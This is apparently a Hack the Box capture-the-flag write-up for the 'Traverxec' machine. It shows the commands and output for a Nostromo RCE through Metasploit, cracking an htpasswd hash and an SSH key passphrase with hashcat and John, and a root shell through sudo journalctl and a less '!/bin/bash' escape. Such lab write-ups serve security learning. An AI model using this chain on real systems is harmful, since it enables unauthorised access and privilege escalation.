Traverxec was an easy difficulty machine on Hack the Box. Here’s my take on solving the challenge

Traverxec

TL;DR: A vulerable Nostromo webserver can be exploited for RCE and reverse shell. That allows to find a .htpasswd file which, after reversing reveals password to HTTP access to a home folder. From there it’s possible to download a private key to SSH user. Privlege escalation is done by running a sudo NOPASSWD command, that allows a command execution when the output is longer than console height (less command).

Recon

Nmap scan reveals that there’s an unusual HTTP server running:

# nmap traverexec.htb -sS -sV -n
-- snip --
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
80/tcp open http nostromo 1.9.6
-- snip --

It turns out that there is a known RCE exploit for that server:

msf5 > search nostromoMatching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/multi/http/nostromo_code_exec 2019-10-20 good Yes Nostromo Directory Traversal Remote Command Execution

User

After setting up neccesary options, the exploit is ready to go:

Running LinEnum on the victim reveals a .htpasswd file:

[-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/

The password can be reversed using hashcat:

# hashcat64.exe hashes.txt -m 500 -a 0 rockyou.txt
-- snip --
$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/:Nowonly4me
-- snip --

The /var/nostromo/conf contains nhttpd.conf file with the following entry:

# HOMEDIRS [OPTIONAL]homedirs  /home
homedirs_public public_www

That means that Nostromo is serving users’ home subfolders. It has to be accessible to read for www-data:

$ ls /home/david/public_www -la
ls /home/david/public_www -la
total 16
drwxr-xr-x 3 david david 4096 Oct 25 15:45 .
drwx--x--x 6 david david 4096 Nov 19 13:46 ..
-rw-r--r-- 1 david david 402 Oct 25 15:45 index.html
drwxr-xr-x 2 david david 4096 Oct 25 17:02 protected-file-area
$ ls /home/david/public_www/protected-file-area -la
ls /home/david/public_www/protected-file-area -la
total 16
drwxr-xr-x 2 david david 4096 Oct 25 17:02 .
drwxr-xr-x 3 david david 4096 Oct 25 15:45 ..
-rw-r--r-- 1 david david 45 Oct 25 15:46 .htaccess
-rw-r--r-- 1 david david 1915 Oct 25 17:02 backup-ssh-identity-files.tgz

backup-ssh-identity-files.tgz contain a SSH private key:

$ cp /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz /tmp/.

$ tar -xvzf backup-ssh-identity-files.tgz

home/david/.ssh/
home/david/.ssh/authorized_keys
home/david/.ssh/id_rsa
home/david/.ssh/id_rsa.pub

$ cd home/david/.ssh/


$ ls -la

total 20
drwx------ 2 www-data www-data 4096 Oct 25 17:02 .
drwxr-xr-x 3 www-data www-data 4096 Nov 19 14:35 ..
-rw-r--r-- 1 www-data www-data 397 Oct 25 17:02 authorized_keys
-rw------- 1 www-data www-data 1766 Oct 25 17:02 id_rsa
-rw-r--r-- 1 www-data www-data 397 Oct 25 17:02 id_rsa.pub
$ cat id_rsa
cat id_rsa
-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,477EEFFBA56F9D283D349033D5D08C4F
seyeH/feG19TlUaMdvHZK/2qfy8pwwdr9sg75x4hPpJJ8YauhWorCN4LPJV+wfCG
-- snip --

The key password can be reversed with John the Ripper:

# ssh2john.exe key.txt > key2.txt# john.exe key2.txt --wordlist=rockyou.txt
-- snip --
Use the "--show" option to display all of the cracked passwords reliably
Session completed
# john.exe key --show
-- snip --
key.txt:hunter
1 password hash cracked, 0 left

Now it’s possible to login as David to SSH and grab user flag:

# ssh david@traverexec.htb -c aes256-ctr -i id_rsa
Enter passphrase for key 'id_rsa': hunter
Linux traverxec 4.19.0-6-amd64 #1 SMP Debian 4.19.67-2+deb10u1 (2019-09-20) x86_64
Last login: Tue Nov 19 14:43:37 2019 from 10.10.14.14
david@traverxec:~$ cat user.txt
7db...

Privlege escalation

In David’s bin folder there’s an interesting script suggesting that journalctl can be sudo’ed without password:

david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

Journalctl runs less commnad when it’s output doesn’t fit the screen. It can be exploited for command execution. Unfortunately, the -n5 argument limits amout of commands output. The console has to be shrunk so that journalctl output doesn’t fit. Then it’s possible to exploit less to spawn a root shell:

david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Tue 2019-11-19 11:57:32 EST, end at Tue 2019-11-19 15:10:06 EST. --
Nov 19 14:22:23 traverxec sudo[1233]: pam_unix(sudo:auth): authentication failure; logname= uid=33 eui
-- snip --
!/bin/bash
root@traverxec:/home/david/bin# cat /root/root.txt
9aa...